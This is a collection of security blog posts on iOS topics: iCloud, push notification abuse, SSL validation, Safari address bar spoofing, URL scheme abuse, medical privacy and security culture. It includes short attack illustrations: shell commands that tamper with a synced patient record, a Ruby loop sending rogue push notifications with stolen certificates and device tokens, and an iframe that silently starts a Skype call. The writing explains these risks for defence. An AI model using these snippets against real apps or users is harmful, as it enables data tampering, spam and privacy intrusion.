Starting with iOS5, iPhone and iPad users do not have to sync their devices with a computer. Using a wireless connection, they can activate their devices as well as backup and restore their data by setting up an iCloud account.

Following are some thoughts on risks and opportunities that may arise for businesses as their employees begin to use iOS devices that are iCloud enabled.

High potential for mass data compromise using automated tools.

An iOS device that is iCloud enabled continuously syncs data to Apple’s data-centers (and to cloud services Apple has in turn leased from Amazon (EC2) and Microsoft (Azure)). The device also performs a backup about once a day when the device is plugged into a power outlet and when WiFi is available (this can also be manually initiated by the user).

It is easy to intercept the traffic between an iOS device and the iCloud infrastructure using an HTTP proxy tool such as Burp. Interestingly, the backupd process also backs up data to the Amazon infrastructure:

In this case, the device had previously authenticated to Apple domains (*.icloud.com and *.apple.com). Most likely, those servers initiated a back-end session with Amazon tied to the user’s session based on the filename provided to the PUT request above.

The biggest point here from a security perspective is that all the information is protected by the user’s iCloud credentials that is present in the Authorization: X-MobileMe-AuthToken header using basic access authentication (base 64).

iCloud backs-up emails, calendars, SMS and iMessages, browser history, notes, application data, phone logs, etc. This information can be a gold-mine for adversaries. It is my hypothesis that in the near future, we are going to see automated tools that will do the following:

The risk to organizations and government institutions is enormous. A malicious entity can automatically download majority of data associated with an individual’s iPhone or iPad of that user’s account simply by gaining access to their iCloud password (which could have been compromised due to password reuse at another service).

Also, Mobile Device Management (MDM) vendors are likely to integrate iCloud related policy settings and this should be leveraged.

3rd party apps as well as iOS apps developed in-house should be assessed for security vulnerabilities and the iCloud API related principles listed in the next section.

iCloud Storage APIs

A significant aspect of the iCloud platform is the availability of the iCloud storage APIs [http://developer.apple.com/icloud/index.php] to developers. These APIs allow developers to write applications that leverage the iCloud to wirelessly push and synchronize data across user devices.

iCloud requires iOS5 and Mac OSX Lion. These operating systems have been recently released and developers are busy modifying their applications to integrate the iCloud APIs. In the coming months, we are bound to see an impressive increase in the number of apps that leverage iCloud.

In this section, I will discuss my initial thoughts on how to securely enable iOS apps using the iCloud Storage APIs. I will step through how to write a simple iOS app that leverages iCloud Storage APIs. This app will create a simple document in the user’s iCloud container and auto update the document when it changes. During this walk-through, I will point out secure development tips and potential abuse cases to watch out for.

Creating an Configuring an App ID and Provisioning Profile for iCloud Services

This is the first step required to allow your test app to be able to use the iCloud services. The App ID is really a common name description of the app to use during the development process.

Figure 1: Creating an App ID using the Developer provisioning portal.

The provisioning portal also requires you to pick a “Bundle Identifier” in reverse-domain style. This has to be a unique string. For example, an attempt to create an App ID with the Bundle Identifier of com.facebook.facebook is promptly rejected because it is most likely in use by the official Facebook app.

The next step is to enable your App ID for iCloud services. Click on “Configure” in your App ID list under the “Action” column. Next, check “Enable for iCloud”

Figure 2: Enabling your App ID for iCloud

Select the “Provisioning” tab and click on “New Profile”. Pick the App ID you created earlier and select the devices you want to test the app on. Note that the simulator cannot access the iCloud API so you will need to deploy the app onto an actual device.

Once you have the App ID configured, you have to create a provisioning profile. A provisioning profile is a property-list (.plist) file signed by Apple. This file contains your developer certificate. Code that is complied with this developer certificate is allowed to execute on the devices selected in the profile.

Figure 3: Provisioning profile loaded in XCode

Download the profile and open it (double-click and XCode should pick it up as shown in Figure 3).

Writing a Simple iCloud App in XCode

In Xcode, create a new project. Choose “Single View Application” as the template. Enter “dox” for the product name and the company identifier you used when creating the App ID. The Device family should be “Universal”. The “Use Automatic Reference Counting” option should be checked and the other options should be unchecked.

Figure 4: Creating a sample iCloud project in XCode

Next, select your project in the “Project Navigator” and select the “dox” target. Click on “Summary” and go to the “Entitlements” section.

Figure 5: Project entitlements (iCloud)

The defaults should look like the screen-shot in Figure 5 and you don’t have to change anything.

Open up AppDelegate.m and add the following code at the bottom of application:didFinishLaunchingWithOptions (before the return YES;):

NSURL *ubiq = [[NSFileManager defaultManager]

URLForUbiquityContainerIdentifier:nil];

if (ubiq) {

NSLog(@"iCloud access at %@", ubiq);

// TODO: Load document...

} else {

NSLog(@"No iCloud access");

}

Figure 6: “Documents & Data” in iCloud settings turned off

Now assume that the test device has the “Documents & Data” preference in iCloud set to “off”. In this case, if you run the project now, you should see the log notice shown in Figure 7.

Figure 7: App unable to get an iCloud container instance

If the “Documents & Data” settings were turned “On”, you should see the log notice similar to Figure 8.

Figure 8: iCloud directory on the local device

Notice that the URL returned is a ‘local’ (i.e. file://) container. This is because the iCloud daemon running on the iOS device (and on OSX) automatically synchronizes information users put into this directory between all of the user’s iCloud devices. If the user also has OSX Lion, they can find their iCloud files created on iOS appear in their ~/Library/Mobile Documents/ directory.

Once you are done, you can deploy your app onto two separate iOS devices and watch the text sync using iCloud. The embedded video above demonstrates the app in action.

Security Considerations

The following are a list of security considerations that may be useful in managing risk pertaining to the iCloud storage APIs.

Guard the credentials to your Apple developer accounts. It is important for you to safeguard your Apple developer account credentials and make sure the credentials are complex enough to prevent potential brute forcing. Someone with access to your developer account could release an app with the same Bundle Seed ID (discussed below) that accesses the users’ iCloud containers and ferries the information to the attacker.

The Bundle Seed ID is used to constrain the local iCloud directory. As you can see in Figure 8, the local directory is in the form of [Bundle Seed/Team ID].[iCloud Container specific in entitlements]. The app can have multiple containers (i.e. multiple directories) if specified in the entitlements, but only in the form of [Bundle Seed ID].* as constrained in the provisioning profile:

...

<key>Entitlements</key>

<dict>

<key>application-identifier</key>

<string>46Q6HN4L88.com.icloudtest.dox</string>

<key>com.apple.developer.ubiquity-container-identifiers</key>

<array>

<string>46Q6HN4L88.*</string>

</array>

<key>com.apple.developer.ubiquity-kvstore-identifier</key>

<string>46Q6HN4L88.*</string>

</dict>

...

<key>TeamIdentifier</key>

<array>

<string>46Q6HN4L88</string>

</array>

...

Figure 9: Entitlements settings visible in XCode

If you try to change the values of com.apple.developer.ubiquity-container-identifiers or com.apple.developer.ubiquity-kvstore-identifier (in your entitlements settings visible in Xcode) to begin with anything other than what you have in your provisioning profile, XCode will complain as shown in Figure 10.

Figure 10: Xcode error about invalid entitlements

It is clear that Apple uses the Bundle Seed ID (Team ID) to constrain access to user data in iCloud between different organizations.As discussed earlier, if someone were to get Apple’s provisioning portal to issue a provisioning profile with someone else’s Team ID, they could write Apps that can (at least locally) have access to the user’s iCloud data since their local iCloud file:// mapping will coincide.

Do not store critical information in iCloud containers, including session data. iCloud data is stored locally and synced to the iCloud infrastructure. Users often have multiple devices (iPhone, iPod Touch, iPad, Macbook, iMac) so their iCloud data will be automatically synced across devices. If a malicious entity were to temporarily gain access to the file-system (by having physical access or by implanting malware), he or she could gain access to the iCloud local containers (/private/var/mobile/Library/Mobile Documents/ in iOS and ~/Library/Mobile Documents/ in OSX). It is therefore a good idea not to store critical information such as session tokens, passwords, financial, and or healthcare data that is personally identifiable.

Do not trust data in your iCloud to commit critical transactions. As discussed in the prior paragraph, an attacker with temporary access to a user’s file system can access iCloud documents stored locally. Note that the attacker can also edit or add files into the iCloud containers and the changes will be synced across devices.

Assume a hospital were to deploy an iCloud enabled medical app to be used by doctors such as the screenshot in Figure 11. If an attacker were to gain access to the doctor’s Macbook Air running OSX for example, they could look at the local filesystem:

$ cd ~/Library/Mobile Documents/46Q6HN4L88~com~hospital~app/Documents

$ ls

Allergies.txt 1.TIFF

$ cat /dev/null > Allergies.txt

$ cp ~/Downloads/1.TIFF 1.TIFF

Once the attacker has issued the commands above, the doctor’s iCloud container will be updated with the modified information across all devices. In this example, the attacker has altered a particular patient’s record to remove listed allergies and replace the X-Ray image.

Other files will be treated as data and can only be deleted all at once. Doing this can allow users to notify you if a bug in your application is causing too much data to be written into iCloud which can exhaust users' storage quotas and thus create a denial of service condition.

Take care to handle conflicts appropriately. Documents that are edited on multiple devices are likely to cause conflicts. Depending upon the logic of your application code, it is important to make sure you handle these conflicts so that the integrity of the user’s data is preserved.

Understand that Apple has the capability to see your users' iCloud data. Data from the local device to the iCloud infrastructure is encrypted during transmit. However, note that Apple has the capability to look at your users' data. There is low probability that Apple would choose to do this but depending upon your business, there may be regulatory and legal issues that may prohibit storage of certain data on the iCloud.

iOS sandboxing vulnerabilities may be exploited by rogue apps. Try putting in the string @”..\..\Documents” in URLByAppendingPathComponent or editing your container identifier in your entitlements to contain “..” or any other special characters. You will note that iOS will either trap your attempt at runtime or replace special characters that can cause an app to break out of the local iCloud directory. If someone were to find a vulnerability in iOS sandboxing or file parsing mechanisms, it is possible they can leverage this to build a rogue app that is able to access another app’s iCloud data.

These security principles also apply to key-value data storage. The iCloud Storage APIs also allow the storage of key-value data in addition to documents. The security tips outlined in this article also apply to key-value storage APIs.

Watch out for iCloud backups. As presented in the earlier section, the user can choose to backup his or her phone data into the iCloud. This includes the Documents/ portion within the app sand-box (Note: This is not the Documents folder created as part of the iCloud container, but is present as part the application bundle). If there is critical information you do not wish to preserve move it to Library/Caches. You may also wish to leverage the addSkipBackupAttributeToItemAtURL method to identify specific directories that should not be backed up.

I hope this article contained information to help you and your organization think through security issues and principles surrounding iCloud. The ultimate goal is to enable technology, but in a way that is cognizant of the associated risks. Feel free to get in touch if you have any comments, questions, or suggestions.

This whitepaper brings together emerging research to illustrate the net-new attack vectors targeting iOS applications. The intended audience for the rest of this paper include technical security analysts and iOS application developers. The following topics are discussed in detail:

In addition to these topics, the Appendix in the whitepaper contains a checklist of items to consider when assessing iOS applications. This list includes traditional application security weaknesses that also apply to iOS. Additional items to consider, such as data protection and file encryption applicable to iOS devices, are also presented in the Appendix.

I trust many may find the information in the paper valuable and actionable. If you have any questions or feedback, please feel free to contact me.

February 07, 2011

Millions of iOS users and developers have come to rely on Apple’s Push Notification Service (APN). In this article, I will briefly introduce details of how APN works and present scenarios of how insecure implementations can be abused by malicious parties.

Apple’s iOS allows some tasks to truly execute in the background when a user switches to another app (or goes back to the home screen), yet most apps will return and resume from a frozen state right where they left off. Apple’s implementation helps preserve battery life by providing the user the illusion that iOS allows for full-fledged multi-tasking between 3rd party apps.

This setup makes it hard for apps to implement features that rely on full-fledged multi-tasking. For example, an Instant Messaging app will want to alert the user of a new incoming message even if the user is using another app. To enable this functionality, the APN service can be used by app vendors to push notifications to the user’s device even when the app is in a frozen state (i.e. the user is using another app or is on the home screen).

Figure 1: Badge and alert notification in iOS

There are 3 types of push notifications in iOS: alerts, badges, and sounds. Figure 1 shows a screen-shot illustrating both an alert and a badge notification.

iOS devices maintain a persistent connection to the APN servers. Providers, i.e. 3rd party app vendors, must connect to the APN to route the notification to a target device.

So how can an app developer implement push notifications? For explicit details, I’d recommend going through Apple’s excellent Local and Push Notifications Programming Guide. However, I will briefly cover the steps below with emphasis on steps that have interesting security implications and tie them to abuse cases and recommendations.

1. Create an App ID on Apple’s iOS Provisioning Portal. This step requires you sign up for a developer account ($99). This is straight-forward: just click on App IDs in the provisioning portal and then select New App ID. Next, enter text in the Description field that describes your app. The Bundle Seed ID is used to signify if you want multiple apps to share the same Keychain store.

The Bundle Identifier is where it gets interesting: you need to enter a unique identifier for your App ID. Apple recommends using a reverse-domain name style string for this.

The Bundle Identifier is significant from a security perspective because it makes its way into the provider certificate we will create later (also referred to as the topic). The APN trusts this field in the certificate to figure out which app in the target user’s device to convey the push message to. As Figure 2 illustrates, an attempt to create an App ID with the Bundle Identifier of com.facebook.facebook is promptly refused as a duplicate, i.e. the popular Facebook iOS app is probably using this in it’s certificate. Therefore, if a malicious entity were to bypass the provisioning portal’s restrictions against allowing an existing Bundle Identifier, then he or she could possibly influence Apple to provision a certificate that can be abused to send push notifications to users of another app (but the malicious user would still need to know the target user's device-token discussed later in this article).

2. Create a Certificate Signing Request (CSR) to have Apple generate an APN certificate. In this step, Keychain on the desktop is used to generate a public and private cryptographic key pair. The private key stays on the desktop. The public key is included in the CSR and uploaded to Apple. The APN certificate that Apple provides back is specific to the app and tied to a specific App ID generated in step 1.

3. Create a Provisioning Profile to deploy your App into a test iOS device with push notifications enabled for the App ID you selected. This step is pretty straight forward and described in Apple’s documentation linked above.

4. Export the APN certificate to the server side. As described in Apple’s documentation, you can choose to export the certificate to .pem format. This certificate can then be used on the server side of your app infrastructure to connect to the APN and send push notifications to targeted devices.

5. Code iOS application to register for and respond to notifications. Your iOS app must register with the device (which in turns registers with the APN) to receive notifications. The best place to do this is in applicationDidFinishLaunching:, for example:

Notice that the delegate is passed the deviceToken. This token is NOT the same as the UDID which is an identifier specific to the hardware.The deviceToken is specific to the instance of the iOS installation, i.e. it will migrate to a new device if the user were to restore a backup in iTunes onto a new device. The interesting thing to note here is that the deviceToken is static across apps on the specific iOS instance, i.e. the same deviceToken will be returned to other apps that register to send push notifications.

The sendProviderDeviceToken: method sends the deviceToken to the provider (i.e. your server side implementation) so the provider can use it to tell the APN which device to send the targeted push notification to.

In the case where your application is not running and the iOS device receives a remote push notification from the APN destined for your app, the didFinishLaunchingWithOptions: delegate is invoked and the message payload is passed. In this case, you would handle and process the notification in this method. If your app is already in the running, then the didReceiveRemoteNotification: method is called (you can check the applicationState property to figure out if the application is active or in the background and handle the event accordingly).

6. Implement provider communication with the APN. With the provider keys obtained in step 4, you can implement server side code to send a push notification to your users.

As illustrated in Figure 3, you will need the deviceToken of the specific user you want to send the notification to (this is the token you would have captured from the device invoking your implementation of the sendProviderDeviceToken method described in Step 4). The Identifier is an arbitrary value that identifies the notification (you can use this to correlate an error-response. Please see Apple’s documentation for details). The actual payload is in JSON format.

Now that we have established details on implementing push-notifications into custom apps, lets discuss applicable security best practices along with abuse cases.

1. Do not send company confidential data or intellectual property in the message payload. Even though end points in the APN architecture are TLS encrypted, Apple is able to see your data in clear-text. There may be legal ramifications of disclosing certain types of information to third-parties such as Apple. And I bet Apple would appreciate it too (they wouldn’t want the liability).

2. Push delivery is not guaranteed so don’t depend on it for critical notifications. Apple clearly states that the APN service is best-effort delivery.

Figure 4: Do not rely on push for critical notifications

As shown in Figure 4, the push architecture should not be relied upon for critical notifications. In addition, iPhones that are not connected to cellular data (or when the phone has low to no signal) MAY not receive push notifications when the display is off for a specific period since wifi is often automatically turned off to preserve battery.

3. Do not allow the push notification handler to modify user data. The application should not delete data as a result of the application launching in response to a new notification. An example of why this is important is the situation where a push notification arrives while the device is locked: the application is immediately invoked to handle the pushed payload as soon as the user unlocks the device. In this case, the user of your app may not have intended to perform any transaction that results in the modification of his or her data.

4. Validate outgoing connections to the APN. The root Certificate Authority for Apple’s certificate is Entrust. Make sure you have Entrust’s root CA certificate so you are able to verify your outgoing connections (i.e. from your server side architecture) are to the legitimate APN servers and not a rogue entity.

5. Be careful with unmanaged code. Be careful with memory management and perform strict bounds checking if you are constructing the provider payload outbound to the APN using memory handling API in unmanaged programming languages (example: memcpy).

6. Do not store your SSL certificate and list of deviceTokens in your web-root. I have come across instances where organizations have inadvertently exposed their Apple signed APN certificate, associated private key, and deviceTokens in their web-root.

Figure 5: Screen-shot of APN certificates and deviceTokens being exposed

The illustration in Figure 5 is a real screen-shot of an iOS application vendor inadvertently exposing their APN certificates as well as a PHP script which lists all deviceTokens of their customers.

Figure 6: Scenario depicting rogue push notifications targeting the Facebook and CNN apps once their provider certificates have been compromised

In this abuse case, any malicious entity who is able to get at the certificates and list of deviceTokens will be able to send arbitrary push notifications to this iOS application vendor’s customers (see Figure 6). For example, the jpoz-apns Ruby gem can be used to send out concurrent rogue notifications:

APNS.host = 'gateway.push.apple.com'

APNS.pem = '/path/to/pwn3d/pem/file'

APNS.pass = ''

APNS.port = 2195

stolen_dtokens.each do |dtoken|

APNS.send_notification(dtoken,‘pwn3d’)

end

I would also highly recommend protecting your cert with a passphrase (it is assumed to be null in the above example). And it goes without saying that you should also keep any sample server side code that has the passphrase embedded in it out of your web-root. In fact, there is no good reason why any of this information should even reside on a host that is accessible from the Internet (incoming) since the provider connections to the APN need to be outbound only.

I feel Apple has done a good job of thinking through security controls to apply in the APN architecture. I hope the suggestions in this article help you to think through how to make sure the APN implementation in your app and architecture is secure from potential abuses.

December 31, 2010

Many iOS applications use HTTP to connect to server side resources. To protect user-data from being eavesdropped, iOS applications often use SSL to encrypt their HTTP connections.

In this article, I will present sample Objective-C code to illustrate how HTTP(S) connections are established and how to locate insecure code that can leave the iOS application vulnerable to Man in the Middle attacks. I will also discuss how to configure an iOS device to allow for interception of traffic through an HTTP proxy for testing purposes.

A Simple App Using NSURLConnection

The easiest way to initiate HTTP requests in iOS is to utilize the NSURLConnection class. Here is sample code from a very simple application that takes in a URL from an edit-box, makes a GET request, and displays the HTML obtained.

The result is a simple iOS application that fetches HTML code from a given URL.

Figure: Simple iOS App using NSURLConnection to fetch HTML from a given URL.

In the screen-shot above, notice that the target URL is https. NSURLConnection seamlessly establishes an SSL connection and fetches the data. If you are reviewing source code of an iOS application for your organization to locate security issues, it makes sense to analyze code that uses NSURLConnection. Make sure you understand how the connections are being inititated, how user input is utilized to construct the connection requests, and if SSL is being used or not. While you are at it, you may also want to watch for NSURL* in general to include invocations to objects of type NSHTTPCookie, NSHTTPCookieStorage, NSHTTPURLResponse, NSURLCredential, NSURLDownload, etc.

Man in the Middle

74.125.224.49 is one of the IP addresses bound to the host name www.google.com. If you browse to https://74.125.224.49, your browser should show you a warning due to the fact that the Common Name field in the SSL certificate presented by the server (www.google.com) does not match the host+domain component of the URL.

Figure: Safari on iOS warning the user due to mis-match of the Common Name field in the certificate.

As presented in the screen-shot above, Safari on iOS does the right thing by warning the user in this situation. Common Name mis-matches and certificates that are not signed by a recognized certificate authority can be signs of a Man in the Middle attempt by a malicious party that is on the same network segment as that of the user or within the network route to the destination.

Figure: NSURLConnection's connection:didFailWithError: delegate is invoked to throw a similar warning.

The screenshot above shows what happens if we attempt to browse to https://74.125.224.49 using our sample App discussed ealier: the connection:didFailWithError: delegate is called indicating an error, which in this case warns the user of the risk and terminates.

This is fantastic. Kudos to Apple for thinking through the security implications and presenting a useful warning message to the user (via NSError).

Unfortunately, it is quite common for application developers to over-ride this protection for various reasons: for example, if the test environment does not have a valid certificate and the code makes it to production. The code below is enough to over-ride this protection outright:

The details on this code is available from this stackoverflow post. There is also a private method for NSURLRequest called setAllowsAnyHTTPSCertificate:forHost: that can be used to over-ride the SSL warnings but Apps that use it are unlikely to get through the App store approval process (Apple prohibits invocations of private API).

If you are responsible for reviewing your organization's iOS code for security vulnerabilities, I highly recommend you watch for such dangerous design decisions that can put your client's data and your company's data at risk.

Intercepting HTTPS traffic using an HTTP Proxy.

As part of performing security testing of applications, it is often useful to intercept HTTP traffic being invoked by the application. Applications that use NSURLConnection's implementation as-is will reject your local proxy's self-signed certificate and terminate the connection. You can get around this easily by implanting the HTTP proxy's self-signed certificate as a trusted certificate on your iOS device [Note: This is not a loop-hole against the precautions mentioned above: in this case we have access to the physical device and are legitimately implatining the self-signed certificate].

Once you have your iOS device or simulator setup using the self-signed certificate of your HTTP proxy, you should be able to intercept HTTPS connections that would otherwise terminate. This is useful for fuzzing, analyzing, and testing iOS applications for security issues.

November 29, 2010

Popular web browsers today do not allow arbitrary websites to modify the text displayed in the address bar or to hide the address bar (some browsers may allow popups to hide the address bar but in such cases the URL is then displayed in the title of the window). The reasoning behind this behavior is quite simple: if browsers can be influenced by arbitrary web applications to hide the URL or to modify how it is displayed, then malicious web applications can spoof User Interface elements to display arbitrary URLs thus tricking the user to thinking he or she is browsing a trusted site.

I’d like to call your attention to the behavior of Safari on the iPhone via a proof of concept demo. If you have an iPhone, browse to the following demo and keep an eye out on the address bar:

Figure: Image on left illustrates the page rendered which displays the ‘fake’ URL bar while the real URL bar is hidden above. Image on right illustrates the real URL bar that is visible once the user scrolls up.

Notice that the address bar stays visible while the page renders, but immediately disappears as soon as it is rendered. Perhaps this may give the user some time to notice but it is not a reasonably reliable control (and I don’t think Apple intended it to be).

I did contact Apple about this issue and they let me know they are aware of the implications but do not know when and how they will address the issue.

I have two main thoughts on this behavior, outlined below:

1. Precious screen real estate on mobile devices. This is most likely the primary reason why the address bar disappears upon page load on the iPhone. Note that on the iPhone, this only happens for websites that follow directives in HTML to advertise themselves as mobile sites (see the source of the index.html in the demo site above for example).

Since the address bar in Safari occupies considerable real estate, perhaps Apple may consider displaying or scrolling the current domain name right below the universal status bar (i.e. below the carrier and time stamp). Positioning the current domain context in a location that is unalterable by the rendered web content can provide the users similar indication that browsers such as IE and Chrome provide by highlighting the current domain being rendered.

2. The consequences of full screen apps in iOS using UIWebView. Desktop operating systems most often launch the default web browser of choice when a http or https handler is invoked (this is most often the case even though the operating systems provide interface elements that can be used to render web content within the applications).

However, in the case of iOS, since most applications are full-screen, it is in the interest of the application designers to keep the users immersed within their application instead of yanking the user out into Safari to render web content. Given this situation, it becomes vital for iOS to provide consistency so the user can be ultimately assured what domain the web content is being rendered from.

To render web content within applications, all developers have to do is invoke the UIWebView class. It is as simple as invoking a line of code such as [webView loadRequest:requestObj]; where requestObj contains the URL to render.

Figure: Twitter App rendering web content on the iPad.

The screenshot above illustrates web-content rendered by the fantastic Twitter app on the iPad. To create this screen-shot, I launched the Twitter app on the iPad and selected a tweet from @appleinsider and clicked on the URL http://dlvr.it/9D81j in the tweet. Notice that the URL of the actual page being rendered is no where to be seen.

In such cases, it is clear that developers of iOS applications need to make sure they clearly display the ultimate domain from which they are rending web content. A welcome addition to this would be default behavior on part of UIWebView to display the current domain context in a designated and consistent location.

Given how rampant phishing and malware attempts are these days, I hope Apple chooses to not allow arbitrary web applications to scroll the real Safari address bar out of view. In the case of applications that utilize UIWebView, I recommend a designated screen location label only accessible by iOS that displays the domain from where the web content is being rendered when serving requests via calls to UIWebView. That said, I do realize how precious real estate is on mobile devices and if Apple choses to come up with a better way of addressing this issue, I'd welcome that as well.

November 08, 2010

In this article, I will discuss the security concerns I have regarding of how URL Schemes are registered and invoked in iOS.

URL Schemes, as Apple refers to them, are URL Protocol Handlers that can be invoked by the Safari browser. They can also be used by applications to launch other applications to perform certain transactions, but this use case isn’t relevant to the scope of this discussion.

In the URL Scheme Referencedocument, Apple lists the default URL Schemes that are registered within iOS. For example, the tel: scheme can be used to launch the Phone application. Now, imagine if a website were to contain the following HTML rendered to someone browsing using Safari on iOS:

Fantastic. A malicious website should not be able to initiate a phone call without the user’s explicit permission. This is the right behavior from a security perspective.

Now, let us assume the user has Skype.app installed. Let us also assume that the user has launched Skype in the past and that application has cached the user’s credentials (this is most often the case: users on mobile devices don’t want to repeatedly enter their credentials so this is not an unfair assumption). Now, what do you think happens when a malicious site renders the following HTML?

<iframe src=”skype://14085555555?call"></iframe>

In this case, Safari throws no warning, and yanks the user into Skype which immediately initiates the call. The security implications of this is obvious, including the additional abuse case where a malicious site can make Skype.app call a Skype-id who can then uncloak the victim’s identity (by analyzing the victim’s Skype-id from the incoming call).

Figure 2: Skype automatically initiating a call on iOS after being invoked by a malicious website

I contacted Apple’s security team to discuss this behavior, and their stance is that the onus is on the third-party applications (such as Skype in this case) to ask the user for authorization before performing the transaction. I also contacted Skype about this issue, but I have not heard back from them.

I do agree with Apple that third-party applications should also take part in ensuring authorization from the user, yet their stance leaves the following concerns unaddressed.

Third party applications can only ask for authorization after the user has already been yanked out of Safari. A rogue website, or a website whose client code may have been compromised by a persistent XSS, can yank the user out of the Safari browser. Since applications on iOS run in full-screen mode, this can be an annoying and jarring experience for the user.

Third party applications can only ask the user for authorization after they have been fully launched. To register a URL Scheme, application developers need to alter their Info.plist file. For example, here is a section from Skype’s Info.plist:

<key>CFBundleURLTypes</key>

<array>

<dict>

<key>CFBundleURLName</key>

<string>com.skype.skype</string>

<key>CFBundleURLSchemes</key>

<array>

<string>skype</string>

</array>

</dict>

</array>

[Note: If you have a jailbroken iOS device and would like to obtain the list of URL Schemes for applications you have downloaded from the App Store, just copy over the Info.plist files for the applications onto your Mac and run the plutil tool to convert them to XML: plutil -convert xml1 Info.plist]

Next, the application needs to implement handling of the message in it’s delegate. For example:

Unlike the case of the tel: handler which enjoys the special privilege of requesting the user for authorization before yanking the user away from his or her browsing session in Safari, third party applications can only request authorization after they have been fully launched.

A solution to this issue is for Apple to allow third party applications an option register their URL schemes with strings for Safari to prompt and authorize prior to launching the external application.

Should Apple audit the security implications of registered URL schemes as part of its App Store approval process? Apple’s tel: handler causes Safari to ask the user for authorization before placing phone calls. The most logical explanation for this behavior is that Apple is concerned about their customers’ security and doesn’t want rogue websites from being able to place arbitrary phone calls using the customer’s device.

However, since the Skype application allows for such an abuse case to succeed, and given that Apple goes to great lengths to curate applications before allowing them to be listed in the App Store, should Apple begin to audit applications for security implications of exposed URL Schemes? After all, Apple is known to reject applications that pose a security or privacy risk to their users, so why not demand secure handling of transactions invoked by URL Schemes as well?

List of registered URL Schemes not available to the user. You can enumerate all the Info.plist files in your iPhone to ascertain the list of URL schemes your iPhone or iPad may respond to assuming you have jailbroken your iPhone. However, it may make sense for this list to be available in the Settings section of iOS so users can look at it to understand what schemes their device responds that can be invoked by arbitrary websites. Perhaps this will mostly appeal to the advanced users yet I feel it will help keep the application designers disciplined the same way the user location notification in iOS does. This will also make it easier for enterprises to figure out what third party applications to provision on their employee devices based on any badly designed URL schemes that may place company data at risk.

Note that in order to create a registry of exposed URL schemes, Apple cannot simply parse information from Info.plist because it only contains the initial protocol string. In other words, the skype: handler responds to skype://[phone_or_id]?call and skype://[phone_or_id]?chat but only the skype: protocol is listed Info.plist while the actual parsing of the URL is performed in code. Therefore, in order to implement this proposed registry system, Apple will have to require developers to disclose all patterns within a file such as Info.plist.

I feel the risk posed by how URL Schemes are handled in iOS is significant because it allows external sources to launch applications without user interaction and perform registered transactions. Third party developers, including developers who create custom applications for enterprise use, need to realize their URL handlers can be invoked by a user landing upon a malicious website and not assume that the user authorized it. Apple also needs to step up and allow the registration of URL Schemes that can instruct Safari to throw an authorization request prior to yanking the user away into the application.

Given the prevalence and ever growing popularity of iOS devices, we have come to depend on Apple’s platform with our personal, financial, and health-care data. As such, we need to make sure both the platforms and the custom applications iOS devices are designed securely. I hope this writeup helped increase awareness of the need to implement URL Schemes securely and what Apple can do to assist in making this happen.

September 29, 2010

Healthcare organizations spend hundreds of millions of dollars every year struggling to secure and protect patient records. Patients have traditionally demanded that their information be secured and inaccessible by the public. Regulations require due diligence to ensure that patient records are protected. In addition to this, healthcare organizations may also consider medical data as their intellectual property that can lead to further business intelligence.

But what happens when patients volunteer their private medical records into the public domain? In this article, I’d like to present my thoughts on this topic.

Consider the PatientsLikeMe website, which is a social networking platform for individuals to publicly share their medical data, including fine details of their diagnosis, physical conditions, locations, medications, mood, and other information. The benefits of PatientsLikeMe is clear: it is a wonderful platform for individuals and medical researchers to find useful statistical information about diseases, and for patients to connect with and share experiences with others who may be suffering similar conditions.

From a security and privacy lens, here are some of my observations:

False sense of anonymity. The PatientsLikeMe website does a fantastic job of declaring its openness policy by warning users that information shared on the platform can be collected and cached by search engines.

I spent some time studying profiles of individuals affected with conditions that, unfortunately, have a social stigma attached to them. A lot of these individuals chose to use a nick-name, or handle, instead of their real name in their profile. However, by using mere link and network analysis techniques (as presented in my Psychotronica series of talks), I was quickly able to uncloak the real identities of many of these individuals.

The issue here is that, despite the awareness efforts of PatientsLikeMe, many individuals using the service have a false sense of privacy: they may feel they are truly anonymous, yet their identities can be easily uncloaked.

Stunning intelligence potential for the adversary. It is clear that information collected from patient records can be useful to an adversary. However, a sophisticated adversary is likely to correlate the information found in the patent record online with additional sources of social data (Facebook profiles, Twitter messages, blogs, etc). This combined dashboard of intelligence, collected from piecing together additional sources of publicly available information, puts the adversary at a significant advantage. Not only can an external entity ascertain pure medical data, but also make judgment-calls on the lifestyle of the particular individual that may have led to his or her condition. In addition, the potential abuse for social engineering and manipulation tactics is also clear.

Business conflict. Many healthcare organizations are struggling to enforce security controls on traditional issues such as internal access management of medical data. Hundreds of millions of dollars are being spent by private healthcare organizations to promote internal security efforts. In the near future, as additional individuals share their medical information on social media platforms, the value of return from access controls to secure patient data will reduce. I realize the regulatory complications and influences here – it will be interesting to see how this plays out.

In summary, the medical benefits of services like PatientsLikeMe is clear. However, I do wish that individuals who utilize these services are more cognizant of the privacy and security implications. I also wish that healthcare organizations quickly rethink their stance on the security and privacy implications of social media (which seems to be limited in scope to monitoring their own employees) to better align the reality of the upcoming social age with their business.

September 12, 2010

Given the continuous and exponential rise in complexity in the field of information security, most often, it is the actual employee that is observed to be the weakest link. End users are repeatedly found to make poor security decisions that appear to be irrational and careless, thus placing their employer at significant business risk.

One emerging school of thought to combat the seemingly nonchalant user attitude against information security is to enforce a consequence-driven work culture that aims to promote positive cultural change by maximizing accountability (e.g., employees that are caught placing confidential data on unencrypted stores or those who bring in personal wireless access points to work are terminated per formal policy).

This discussion brings together insights from the field of behavioral economics and recent research literature to demonstrate why 1) a pure consequence driven approach that solely relies on accountability does not promote risk reduction to the enterprise, and 2) why employees are rational in rejecting information security rules even when clear consequences are published and enforced.

1. Introduction

When it comes to following basic information security best practices, many employees appear to be irrational despite well advertised consequences: they go trigger-happy while browsing the web and download malware to their corporate laptops, they get around password complexity policies to choose the weakest passwords they can get away with [1][2], they ignore certificate errors and accept security warnings without reading them [3] and they inadvertently expose confidential data on social media sites [4].

Clearly, there are specific cases of malicious intent on the part of unethical employees who are aware of their actions. However, the scope of this discussion is limited to employees who do not have malicious intent, yet place the enterprise at risk by rejecting repeated security advice.

In this discussion, I argue that a purely consequence and accountability driven approach to influencing user behavior is a myopic strategy that is not likely to succeed in promoting significant risk reduction to the enterprise. I argue that in order to influence users to promote positive cultural change in security related behavior, the enforcers must comprehend additional variables such as the difference in the perspective of risk to the individual, psychological biases and simple behavioral economics.

2. The Perspective of the End User

Using basic risk assessment principles, it is possible to estimate the risk to a business should certain events occur. While these events may pose a significant risk to the enterprise as a collective, the probability and cost to the individual employee can differ. The realization of this variance in perspective between the individual and the collective sets the stage for further discussion on psychology and economics covered in the following sections.

2.1 Collective Risk to the E

nterprise Versus the Individual

